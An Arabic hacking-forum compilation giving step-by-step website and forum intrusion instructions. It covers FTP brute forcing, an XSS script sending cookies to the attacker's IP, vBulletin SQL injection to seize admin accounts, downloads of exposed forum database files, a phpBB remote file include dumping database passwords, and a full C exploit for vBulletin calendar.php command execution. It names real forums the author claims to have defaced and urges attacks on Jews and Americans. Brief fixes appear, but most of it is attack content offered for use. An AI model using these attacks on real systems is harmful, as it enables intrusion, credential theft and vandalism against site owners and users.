قم بكتابة اسم الموقع بجوارها على سبيل المثال
Victim.com
victim = الموقع الذى تريد احضار المعلومات عنه
ثم اضغط go
سيقوم فى هذه الحالة باحضار معلومات عن الموقع الذى تريدة اليك وعن الحماية التى يستخدموها والشركة المستضيفة للموقع
قم بقرائة البيانات جيدا اذا وجدت ما يكفيك من المعلومات تكون قد انتهيت من هذه الخطوة اذ لم يكن قم باحضار معلومات عن الشركة المستضيفة والذى سيعطيك عنوان موقعها ضمن البيانات قم بادخال عنوان الموقع فى نفس الموقع لتحضر معلومات اكثر
ثم قم بالتدقيق فى نظم الحماية التى تعطيها الشركة لعملائها

واذا لم تجد ايضا قم بالدخول الى هذا الموقع فهو يعتبر من افضل المواقع التى تعطيك معلومات عن نظم الحماية
http://www.netcraft.com

وهكذا نكون قد انتهينا من اول خطوة

---------------------------------------

قم باحضار عنوان الاى بى الخاص بالموقع من خلال

اذهب الى استارتstart ومنها تشغيل runواكتب الامر command واكتب فى شاشة الدوس التى ستظهر ping www.vicitm.com حيث www.vicitim.com هو الموقع الضحية

---------------------------------------

قم بعمل سكان على الموقع من خلال اى برامج السكانر على المواقع مثل برنامج
site port scan , Gfi lan giard network securty scanner
او برامج عمل السكان على الاجزة لكنها ستكون ضعيفة

وهذه هى اهم خطوة لان من خلالها سنقوم بالبحث عن الثغرات الموجوده فى السيرفر
غالبا ما ستجد البورت 80 و 21 و 808
لا يمكننا الهجوم من خلال البورت رقم 21 حيث انه سيكون مشفر بكلمة سر لصالح صاحب الموقع لانه عنوان الاف تى بى الذى يقوم برفع الملفات من خلاله

لدينا فى اكثر الحالات منفذان البورت 80 و 808
او 80 فقط اذا كان

اذا ظهر لك 80 فقط فما فى شىء بيتغير وتكون الخطوات تمام
قم بتجرب الهجوم على المنافذ التى ظهرت لك مفتوحة مهما كانت من خلال برنامج
ws-ftp
او
cute
مع تغيير البورت من 21 الى 80 او المنفذ الذى ظهر اليك مفتوح فى خيارات الادفاسيد advanced الموجودة فى الشاشة الابتدائية للبرنامج
قم بكتابة مكان host رقم الاى بى الخاص بالموقع او عنوان الموقع عن طريق الاف تى بى وغالبا ما يكون ftp.sitename.address
sitename = اسم الموقع
address = الامتداد .com او .net او غير ذلك

فى المرة هذه الخطوة قم بالدخول بصفة زائر
وذلك عن طريق وضع علامة صح امام كلمة anonymous
وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك
اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة فان قسم الزوار يكون فارغ
اما اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع

واذا وجدت نفسك فى قسم الزوار عليك ان تكمل معنا المسار
قم بتحميل برنامج unsecure وهو افضل برامج اختراق المواقع
لانه به مميزات هائلة وهو من افضل البرامج بل افضلها على الاطلاق
وستجدة فى كثيير من المواقع فقط قم بالبحث فى محرك بحث جوجل
عن هذا الاسم
unsecure 1.2
وستجد مئات المواقع باذن الله
بعد ان تقوم بتحميل البرنامج
قم بكتابة عنوان الاف تى بى الخاص بالموقع
او الاى بى اذا قمت بالحصول عليه من خلال الطريقة التى قمت بشرحها
قم بتحديد مكان القاموس وبالتحديد على جميع خيارات البرتا فورس
لتشكيل هجوم ثنائى مضاعف ثم قم بعمل كونكت
وانتظر حتى يجد الباس ورد وغالبا ما سيجدها لان نظام البرتا فورس يقوم بتخمين كلى للباس وردات

بعد ان تاتيك الباس ورد قم بالدخول بواسطتها من خلال برنامج الاف تى بى من البورت 21 وليس 80

واكمل البيانات وضع مكان اليوسر نيم اسم الموقع بدون دوت
مثال اذا كان الموقع usa.com
يكون اسم الدخول usa

ومكان الباس ورد قم بكتابة الباس ورد التى قام البرنامج باحضارها اليك

وهكذا تكون قد اخترقت الموقع

اما اذا لم تنجح معك هذه الطرق التى قمت بوضعها لك ولم تستطيع اختراق الموقع فعليك ان تنسى عملية اختراق الموقع نهائيا من الافضل لانها فى هذه الحالة ستكون مستحيلة فانت قد قمت بهذه الطريقة باختراق سيرفر DNS وهو من افضل نظم الحماية من خلال البورت 80
وقمت باستعمال برنامج unsecure
ولم تستطيع
وعملت scan
وحاولت الاختراق من المنافذ التى ظهرت لك مفتوحة من خلال الاف تى بى ولم تستطيع
فان لم تستطيع اختراق الموقع قم بنسيان هذا الموقع فورا
منقووووووووول

جميع اختراقات المنتديات بجميع انواعها ...... هام جدا جدا جدا
________________________________________

مجموعه مواضيع مفيدة لكل الهاكرز وبجميع مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء إخوانكم في الدين
ولكن أرجوا أن تستخدموها ضد اليهود والامريكان

أولا سم بالله وابدأ :
بسم الله الرحمن الرحيم

جميع طرق اختراق المنتديات

---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .

----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('<img
src="http://my_ip_address/'+document.cookie+'">';</script>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .

أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين

======================================
إختراق منتديات VP
======================================
اختراق المنتديات بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = - .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u...info&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

http://URL/member.php?soitgoe68e45u...etinfo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&...VALIDPASS&url=');'.$use rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH E RE+username='ADMIN'').'

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :

أنت قمت بكتابة كلمة سر خاطئة

you typed in the wrong password

9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم

======================================
إختراق منتديات xmb
======================================
تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..

وصف للثغره::
وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر

الأصدار المصاب:::
XMB 1.6 Magic Lantern Final

الشرح والتطبيق:::
جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:

1- عليك بالذهاب الى موقع جوجل http://www.google.com/
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون متل هدا
http://www.******.com/massegboard/index_log.log
5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل
هذا مثلا::
xmbuser=admin
واباس راح تلقاه قدامه مثل هذا
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
ftp://www.cafecounterintelligence.com/cci/chigger.exe

======================================
إختراق منتديات Web Wiz Guide
======================================
مثال:http://host.basharnet.com/forum
هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى
أغلب المنتديات مصابة بهذه الثغرة

بسم الله الرحمن الرحيم

الشرح: ثغرة تصيب منتديات Web Wiz Guide

أولا إذهب إلى google
اكتب
Web Wiz forum

وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/wwforum.mdb

حمل الملف وادخل عليه عن طريق microsoft office access

بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin

سجل اسمك والباسوورد

الآن أنت في لوحة التحكم
ها ها ها ها
بس ما حدا يخترق المنتديات الوجودة في محرك البحث قوقل التي قمت باختراقها أنا
هذا منتدى قمت باختراقه لاحقا
http://www.plasticcube.com/Forum/default.asp
اكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد
وهي منندى ثان
هذا منتدى دينيماركي
http://www.naturklub.dk/forum/

ثغرة في معظم منتديات الـ asp

++++++++++++++++++++++++++
سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
وعليها فقس
طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها .

بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ
وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
sqlserver && sql && M.S Access

واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا .

واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp
مثل هذا المنتدى http://www.khill.co.uk/forum/philboard.asp
وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج ....

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
كيف تحمل قاعدة البيانات ؟
اكتب هذا الامتداد
وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة
وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات
database/philboard.mdb
وتكتبه بعد اسم الموقع والمنتدى مثل
http://www.khill.co.uk/forum/database/philboard.mdb

ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس
وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات
من ضمنها وهو المهم جدول المستخدمين ال users
وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد

الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام

philboard_admin.asp وهذا عنوانها
مثال
http://www.khill.co.uk/forum/philboard_admin.asp

ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها
hacked by xxxxxxxxxx
xxxxxxx يعني اسمك ,,,

من وين ؟

من المربعين الموجودة بالاسفل في لوحة التحكم
اكتب في المستطيل hacked by xxxxxxxxxx
وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
واضغط add يعني اضافة

ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق لك

والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد

__________________________________________________

تفضلو ثغرة في هاك الرد السريع منتدى PHPBB

عند تركيبك لهاك الرد السريع
سوف تجد هذا الكود

if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}

دقق جيدا بهذا الكود
ثم أنشاء ملف جديد سمه extension.inc

وضع داخلها مثلا
شفرة

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>

يمكنك وض الخيارات التي تود مشاهدتها من الهاك

الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
أتجه الى هذا العنوان

URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles

بسهولة أستبدل [phpBB_Forum]
بعنوان المنتدى المستهدف
[Your Server]
بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به

ماذا ترى؟؟؟
معلومات قاعدة البيانات بين ايديك

الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات :

ببساطة أفتح الملف quick_reply.php
أبحث عن
if ( $mode == 'smilies' )
أَضف بعدها مباشرة
phpbb_root_path = "./";

وانشاءالله انحلت المشكلة

_________________

ثغره جديده في منتديات الvb
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله

لكن هذي كانت على النسخة التجريبية Beta

بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك

طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php

PHP:

--------------------------------------------------------------------------------

From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln

---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.

-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>

---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------

-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;

-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;

-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />

<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You
can write your own JS codes
var xss = "\"><script>alert(document.coo
kie)</script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>

*You may need login first

Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>

الموضوع منقول

اختراق جميع المنتديات.......الجزء2
________________________________________

--------------------------------------------------------------------------------

ثغره جميله لاختراق منتيات الفورم
____________________________
طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .

وامتدادها تكون . . .
admin/wwforum.mdb

www.###.com/forum
تصبح . . .
www.###.com/forum/admin/wwforum.mdb

طريقه البحث عن الثغره . . . .
www.google.com
وتبحث عن
Web Wiz forum

ويمكنك كتابه
Web Wiz forum 1
Web Wiz forum 2.1

__________________________________________________
___________
ثغرة في منتديات vBulletin في ملفcalendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd

______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://vulnerable/forum/memberlist....Elocation%3D%27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%

2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco

rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://www.swgmotu.com.

With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------

منقول من موقع امركي

___________________________________
ثغرة vbulletin2

gosper is credited with disclosing this to securiteam on 9-24-02 along with a
working exploit and he probably discovered it too. I wrote this because his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a date
argument which is essential for exploiting the security hole. I also used an
fdopen() and fgets() to make sure all the output was recieved and displayed
correctly, at least I hope it works better . Last thing I built in was HTTP
version 1.1 support so that you can use this against virtual hosts. Yeah... and
you can exploit this with a web browser too, its just easier to use this program,
most of the time.

Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozane (www.ozane.net). If I
forgot you, well shit.

Compile: gcc vbcal.c -o vbcal
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"

void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}

void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}

int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;

memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));

prog = argv[0];

fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[ www.fsix.net\n");

if (argc < 5 || argc > 12)
usage(prog);

while ( (c = getopt(argc, argv, "h

:u:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}

if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);

bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);

alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';

if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);

for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug. */
if (verbose == 1)
printf("\nSending: %s", data);

send(sockfd, data, sizeof(data), 0);

if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}

memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));

fclose(f);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
-----------------------------------

منقول من موقع أمريكي يالي بدو يترجو يحط ترجمتوا بالموضوع هذا
______________________________
ثغرة vBulletin

quote:
--------------------------------------------------------------------------------
Originally posted by MAKS:
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://vulnerable/forum/memberlist....Elocation%3D%27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%

2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

